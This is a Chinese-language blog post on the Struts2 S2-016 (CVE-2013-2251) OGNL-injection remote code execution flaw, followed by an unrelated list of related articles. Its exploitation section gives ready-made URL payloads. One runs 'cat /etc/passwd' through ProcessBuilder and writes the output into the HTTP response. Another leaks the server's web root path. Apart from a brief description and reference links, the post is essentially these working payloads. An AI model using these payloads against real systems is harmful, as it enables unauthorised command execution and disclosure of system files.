S2-016 遠程代碼執行漏洞

原創

2018-12-13 01:54

在struts2中，DefaultActionMapper類支持以"action:"、“redirect:”、"redirectAction:"作爲導航或是重定向前綴，但是這些前綴後面同時可以跟OGNL表達式，由於struts2沒有對這些前綴做過濾，導致利用OGNL表達式調用java靜態方法執行任意系統命令。

漏洞記錄

S2-016
CVE-2013-2251
影響版本：Struts 2.0.0 – Struts 2.3.15
http://struts.apache.org/release/2.3.x/docs/s2-016.html
影響範圍非常大

漏洞檢測利用

驗證：
訪問http://192.168.1.15:8080/index.action?redirect:OGNL表達式即可執行OGNL表達式。

http://192.168.1.15:8080/index.action?action:%25{3*4}

執行任意命令EXP

?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}

爆網站路徑EXP

?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D

k8工具檢測利用

執行命令：

參考鏈接：
https://www.freebuf.com/vuls/11220.html
https://github.com/vulhub/vulhub/blob/master/struts2/s2-016/README.zh-cn.md

發表評論

所有評論

還沒有人評論，想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.

相關文章

Paimon筆記

支持高吞吐數據攝入、變更追蹤、高效分析的流批數據湖基於LSM提升寫入速度並降低寫入消耗；基於有序的SortRun裁剪大部分數據以提升查詢性能；支持多種merge引擎實現高性能流表打寬基於Flink&Paimon實現，提供數據一致性管理能

2024-06-16 13:46:55

存檔-環境信息conda

3060 (Pytorch 2) 4090 (Pytorch 2) 3060 (Pytorch 1) name: basechannels: - nvidia/label/cuda-11.8.0 - defaultsdep

太一吾魚水

2024-06-16 13:44:44

存檔-環境信息apt

1 !apt list --installed 2 Listing... Done 3 accountsservice/now 0.6.55-0ubuntu12~20.04.5 amd64 [installed,upgr

太一吾魚水

2024-06-16 13:44:44

Wireshark 安裝+使用（一）

https://blog.csdn.net/zhuizhufanxin123/article/details/103982940

規格嚴格-功夫到家

2024-06-16 13:43:14

metasploit學習

Metasploit(MSF)使用詳解—以kali系統環境下永恆之藍（ms17_010）爲例 https://blog.csdn.net/weoptions/article/details/133039825 https://blog.cs

規格嚴格-功夫到家

2024-06-16 13:43:14

VirtIO drivers for Linux, Windows and etc.

Why do you need VirtIO driver? It's useful when you use Linux/Windows VMs in PVE. Usually when you attach a network to t

2024-06-16 13:42:04

Linux 命令大放送！（第一輯）

涓涓細流，終匯大海。在 "Shell 小技能" 一文中，講到了 Shell 組合 linux 命令的實用小技能。每一條 linux 命令，都是一個小工具。 Shell 可以將很多小工具組合成更強大的實用工具。本文主要梳理程序員常用

2024-06-16 13:39:44

Windows開的熱點手機能連上但上不了網

什麼更新驅動，設置“允許共享...”，啓動幾個服務都沒用，對我有用的辦法是：刪除註冊表鍵HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WlanSvc\Parameters\Ho

2024-06-16 13:39:14

dotnet 簡單控制檯使用 KernelMemory 向量化文本嵌入生成和查詢

本文將和大家簡單介紹一下如何在控制檯裏面使用 Microsoft.KernelMemory 調用 TextEmbedding 對一些文本知識庫內容生成向量化信息，以及進行向量化查詢本文屬於 SemanticKernel 入門系列博客，更多

2024-06-16 13:38:54

WPF 通過 SetWindowDisplayAffinity 配置禁止對窗口進行截圖或錄屏

有些應用程序比較機密或隱私，不期望被其他截圖軟件截圖到應用的窗口，或者被錄屏軟件錄製到。簡單的方法是通過 SetWindowDisplayAffinity 方法進行配置窗口阻止截圖軟件對其截圖開始之前必須說明的是對抗截圖錄屏是一個矛和盾的

2024-06-16 13:38:54

Vue微前端架構與Qiankun實踐理論指南

title: Vue微前端架構與Qiankun實踐理論指南 date: 2024/6/15 updated: 2024/6/15 author: cmdragon excerpt: 這篇文章介紹了微前端架構概念，聚焦於如何在Vue.j

2024-06-16 13:38:23

博客園商業化之路-衆包平臺：繼續召集早期合作開發者

會員、周邊、廣告是園子現在維持生存的主要收入來源，而衆包平臺是園子未來實現商業化規模增長的希望所在。今年5月開始的衆包平臺建設是萬里長征，不僅需要融資，還需要找到合夥人組建新的團隊。雖然當前既沒有錢又沒人，但萬里長征已經邁出了第一步，採用

博客園團隊

2024-06-16 13:30:43

Linux內核版本以及部分參數與性能之二

Linux內核版本以及部分參數與性能之二版本範圍 grubby --set-default /boot/vmlinuz-6.9.4-1.el7.elrepo.x86_64 grubby --set-default /boot/vmlin

濟南小老虎

2024-06-16 13:29:23

[轉帖]性能分析之TCP全連接隊列佔滿問題分析及優化過程

https://cloud.tencent.com/developer/article/1558493 前言在對一個擋板系統進行測試時，遇到一個由於TCP全連接隊列被佔滿而影響系統性能的問題，這裏記錄下如何進行

濟南小老虎

2024-06-16 13:29:23

那些日子九

其實有人可能會問，你怎麼挺多故事或者爲什麼看着你的文章總感覺你像一個真正處在巔峯時期的作者一樣文思泉湧呢？你要知道的是，我也玩遊戲，還一度沉迷過當然別學我，如果現在讓我重新選擇，我會把玩遊戲的時間玩遊戲花的錢都用在投資自己上，或者做好健身

2024-06-16 13:28:43

24小時熱門文章

最新文章

最新評論文章